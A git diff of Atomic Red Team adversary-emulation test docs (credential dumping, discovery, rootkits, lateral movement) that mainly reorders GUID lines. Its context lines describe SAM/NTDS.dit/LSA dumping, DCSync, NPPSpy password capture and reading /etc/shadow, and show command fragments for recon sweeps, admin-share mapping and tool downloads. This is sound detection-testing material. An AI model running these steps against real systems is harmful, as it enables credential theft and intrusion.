## Atomic Test #2 - Registry parse with pypykatz - -auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 - Parses registry hives to obtain stored credentials + **Supported Platforms:** Windows +**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263 + + +
@@ -132,14 +136,16 @@ pip install pypykatz
## Atomic Test #3 - esentutl.exe SAM copy - -auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 - Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. + **Supported Platforms:** Windows +**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480 + + + #### Inputs:
@@ -170,13 +176,15 @@ del #{copy_dest}\#{file_name} >nul 2>&1
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames - -auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 - Executes a hashdump by reading the hasshes from the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193 + + +
diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index c89af84f..a82206f8 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -30,15 +30,17 @@ The following tools and techniques can be used to enumerate the NTDS file and th
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin - -auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f + + + #### Inputs:
@@ -75,9 +77,6 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy - -auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -85,9 +84,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. + **Supported Platforms:** Windows +**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03 + + + #### Inputs:
@@ -151,9 +155,6 @@ mkdir #{extract_path}
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil - -auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
@@ -161,9 +162,14 @@ uses the "IFM" or "Install From Media" backup functionality that allows Active D subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723 + + + #### Inputs:
@@ -205,15 +211,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #4 - Create Volume Shadow Copy with WMI - -auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da + + + #### Inputs:
@@ -250,15 +258,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #5 - Create Volume Shadow Copy with Powershell - -auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24 + + + #### Inputs:
@@ -283,15 +293,17 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
## Atomic Test #6 - Create Symlink to Volume Shadow Copy - -auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702 + + + #### Inputs:
diff --git a/atomics/T1003.004/T1003.004.md b/atomics/T1003.004/T1003.004.md
index 05973de3..15260a63 100644
--- a/atomics/T1003.004/T1003.004.md
+++ b/atomics/T1003.004/T1003.004.md
@@ -12,16 +12,18 @@
## Atomic Test #1 - Dumping LSA Secrets - -auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f - Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc. + **Supported Platforms:** Windows +**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f + + + #### Inputs:
diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md
index c6708587..c9efc3ad 100644
--- a/atomics/T1003.006/T1003.006.md
+++ b/atomics/T1003.006/T1003.006.md
@@ -14,16 +14,18 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
## Atomic Test #1 - DCSync - -auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e - Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729) + **Supported Platforms:** Windows +**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e + + + #### Inputs: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index 99420fb6..d2d5875d 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -14,14 +14,16 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
## Atomic Test #1 - Dump individual process memory with sh (Local) - -auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 - Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. + **Supported Platforms:** Linux +**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80 + + + #### Inputs: @@ -73,14 +75,16 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa
## Atomic Test #2 - Dump individual process memory with Python (Local) - -auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 - Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. + **Supported Platforms:** Linux +**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63 + + + #### Inputs: diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index fb75bbaa..496d6d4c 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -15,13 +15,15 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
## Atomic Test #1 - Access /etc/shadow (Local) - -auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 - /etc/shadow file is accessed in Linux environments + **Supported Platforms:** Linux +**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235 + + + #### Inputs: @@ -51,13 +53,15 @@ rm -f #{output_file}
## Atomic Test #2 - Access /etc/passwd (Local) - -auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d - /etc/passwd file is accessed in Linux environments + **Supported Platforms:** Linux +**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d + + + #### Inputs: diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 8b9193ca..f7c73c92 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -15,9 +15,6 @@ Several of the tools mentioned in associated sub-techniques may be used by both
## Atomic Test #1 - Gsecdump - -auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9 - Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. @@ -26,9 +23,14 @@ If you see output that says "compat: error: failed to create child process", exe You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first. + **Supported Platforms:** Windows +**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9 + + + #### Inputs: @@ -72,16 +74,18 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
## Atomic Test #2 - Credential Dumping with NPPSpy - -auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 - Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy + **Supported Platforms:** Windows +**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 + + + diff --git a/atomics/T1006/T1006.md b/atomics/T1006/T1006.md index 203a2b06..19a34276 100644 --- a/atomics/T1006/T1006.md +++ b/atomics/T1006/T1006.md @@ -12,9 +12,6 @@ Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Cit
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell) - -auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b - This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. @@ -24,9 +21,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti 00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS ``` + **Supported Platforms:** Windows +**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b + + + #### Inputs: diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index 7cb3c441..faff45d6 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -12,15 +12,17 @@
## Atomic Test #1 - System Service Discovery - -auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71 - Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71 + + + @@ -42,15 +44,17 @@ sc query state= all
## Atomic Test #2 - System Service Discovery - net.exe - -auto_generated_guid: 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 - Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s + **Supported Platforms:** Windows +**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 + + + #### Inputs: diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index e706e035..8655b46f 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -10,15 +10,17 @@
## Atomic Test #1 - List Process Main Windows - C# .NET - -auto_generated_guid: fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 - Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 + + + #### Inputs: diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 650fef02..272ee9ac 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -12,9 +12,6 @@ The Registry contains a significant amount of information about the operating sy
## Atomic Test #1 - Query Registry - -auto_generated_guid: 8f7578c4-9863-4d83-875c-a565573bbdf0 - Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: @@ -22,9 +19,14 @@ https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-se https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0 + + + diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 62b1a33f..43f2a795 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -16,13 +16,15 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
## Atomic Test #1 - Loadable Kernel Module based Rootkit - -auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 - Loadable Kernel Module based Rootkit + **Supported Platforms:** Linux +**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553 + + + #### Inputs: @@ -70,13 +72,15 @@ mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
## Atomic Test #2 - Loadable Kernel Module based Rootkit - -auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f - Loadable Kernel Module based Rootkit + **Supported Platforms:** Linux +**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f + + + #### Inputs: @@ -127,9 +131,6 @@ sudo depmod -a
## Atomic Test #3 - Windows Signed Driver Rootkit Test - -auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae - This test exploits a signed driver to execute code in Kernel. This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html @@ -139,9 +140,14 @@ https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.htm The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. + **Supported Platforms:** Windows +**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae + + + #### Inputs: diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index fcc7fb8d..35bd3edd 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -26,15 +26,17 @@ Adversaries may use the information from [System Network Configuration Discovery
## Atomic Test #1 - System Network Configuration Discovery on Windows - -auto_generated_guid: 970ab6a1-0157-4f3f-9a73-ec4166754b23 - Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23 + + + @@ -58,15 +60,17 @@ net config
## Atomic Test #2 - List Windows Firewall Rules - -auto_generated_guid: 038263cb-00f4-4b0a-98ae-0696c67e1752 - Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752 + + + @@ -86,15 +90,17 @@ netsh advfirewall firewall show rule name=all
## Atomic Test #3 - System Network Configuration Discovery - -auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 - Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17 + + + @@ -117,15 +123,17 @@ if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style) - -auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2 - Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2 + + + @@ -148,16 +156,18 @@ nltest /domain_trusts
## Atomic Test #5 - List Open Egress Ports - -auto_generated_guid: 4b467538-f102-491d-ace7-ed487b853bf5 - This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5 + + + #### Inputs: @@ -226,14 +236,16 @@ Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects - -auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee + + + #### Inputs: @@ -270,13 +282,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Qakbot Recon - -auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b - A list of commands known to be performed by Qakbot for recon purposes + **Supported Platforms:** Windows +**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b + + + #### Inputs: @@ -301,17 +315,19 @@ A list of commands known to be performed by Qakbot for recon purposes
## Atomic Test #8 - List macOS Firewall Rules - -auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88 - "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. + **Supported Platforms:** macOS +**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88 + + + diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 2f288279..5d28a39a 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -32,15 +32,17 @@ Specific to macOS, the bonjour protocol exists to discover addition
## Atomic Test #1 - Remote System Discovery - net - -auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd - Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled. + **Supported Platforms:** Windows +**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd + + + @@ -61,15 +63,17 @@ net view
## Atomic Test #2 - Remote System Discovery - net group Domain Computers - -auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f - Identify remote systems with net.exe querying the Active Directory Domain Computers group. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f + + + @@ -89,15 +93,17 @@ net group "Domain Computers" /domain
## Atomic Test #3 - Remote System Discovery - nltest - -auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 - Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 + + + #### Inputs: @@ -122,15 +128,17 @@ nltest.exe /dclist:#{target_domain}
## Atomic Test #4 - Remote System Discovery - ping sweep - -auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 - Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592 + + + @@ -150,15 +158,17 @@ for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
## Atomic Test #5 - Remote System Discovery - arp - -auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 - Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574 + + + @@ -178,15 +188,17 @@ arp -a
## Atomic Test #6 - Remote System Discovery - arp nix - -auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 - Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951 + + + @@ -218,15 +230,17 @@ echo "Install arp on the machine."; exit 1;
## Atomic Test #7 - Remote System Discovery - sweep - -auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de - Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de + + + #### Inputs: @@ -253,15 +267,17 @@ for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -e
## Atomic Test #8 - Remote System Discovery - nslookup - -auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f - Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f + + + @@ -286,15 +302,17 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
## Atomic Test #9 - Remote System Discovery - adidnsdump - -auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959 - This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will list dns zones in the terminal. + **Supported Platforms:** Windows +**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959 + + + #### Inputs: @@ -351,14 +369,16 @@ pip3 install adidnsdump
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects - -auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4 + + + #### Inputs: @@ -395,14 +415,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects - -auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e + + + #### Inputs: diff --git a/atomics/T1020/T1020.md b/atomics/T1020/T1020.md index f7ba85be..3c62c9dd 100644 --- a/atomics/T1020/T1020.md +++ b/atomics/T1020/T1020.md @@ -12,15 +12,17 @@ When automated exfiltration is used, other exfiltration techniques likely apply
## Atomic Test #1 - IcedID Botnet HTTP PUT - -auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 - Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file + **Supported Platforms:** Windows +**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 + + + #### Inputs: diff --git a/atomics/T1021.001/T1021.001.md b/atomics/T1021.001/T1021.001.md index 93c50921..1d647cd1 100644 --- a/atomics/T1021.001/T1021.001.md +++ b/atomics/T1021.001/T1021.001.md @@ -16,13 +16,15 @@ Adversaries may connect to a remote system over RDP/RDS to expand access if the
## Atomic Test #1 - RDP to DomainController - -auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e - Attempt an RDP session via Remote Desktop Application to a DomainController. + **Supported Platforms:** Windows +**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e + + + #### Inputs: @@ -72,13 +74,15 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - RDP to Server - -auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b - Attempt an RDP session via Remote Desktop Application over Powershell + **Supported Platforms:** Windows +**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b + + + #### Inputs: diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md index f772ec3d..6cfb82c9 100644 --- a/atomics/T1021.002/T1021.002.md +++ b/atomics/T1021.002/T1021.002.md @@ -20,13 +20,15 @@ Windows systems have hidden network shares that are accessible only to administr
## Atomic Test #1 - Map admin share - -auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 - Connecting To Remote Shares + **Supported Platforms:** Windows +**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3 + + + #### Inputs: @@ -54,13 +56,15 @@ cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}
## Atomic Test #2 - Map Admin Share PowerShell - -auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 - Map Admin share utilizing PowerShell + **Supported Platforms:** Windows +**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5 + + + #### Inputs: @@ -87,13 +91,15 @@ New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{
## Atomic Test #3 - Copy and Execute File with PsExec - -auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf - Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). + **Supported Platforms:** Windows +**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf + + + #### Inputs: @@ -135,14 +141,16 @@ Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
## Atomic Test #4 - Execute command writing output to local Admin Share - -auto_generated_guid: d41aaab5-bdfe-431d-a3d5-c29e9136ff46 - Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks. + **Supported Platforms:** Windows +**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46 + + + #### Inputs: diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md index d197e64c..a51150c8 100644 --- a/atomics/T1021.003/T1021.003.md +++ b/atomics/T1021.003/T1021.003.md @@ -16,9 +16,6 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
## Atomic Test #1 - PowerShell Lateral Movement using MMC20 - -auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 - Powershell lateral movement using the mmc20 application com object. Reference: @@ -26,9 +23,14 @@ Reference: https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ Upon successful execution, cmd will spawn calc.exe on a remote computer. + **Supported Platforms:** Windows +**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 + + + #### Inputs: diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md index a5fb4f0d..4a0d0636 100644 --- a/atomics/T1021.006/T1021.006.md +++ b/atomics/T1021.006/T1021.006.md @@ -16,15 +16,17 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
## Atomic Test #1 - Enable Windows Remote Management - -auto_generated_guid: 9059e8de-3d7d-4954-a322-46161880b9cf - Powershell Enable WinRM Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. + **Supported Platforms:** Windows +**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf + + + @@ -44,15 +46,17 @@ Enable-PSRemoting -Force
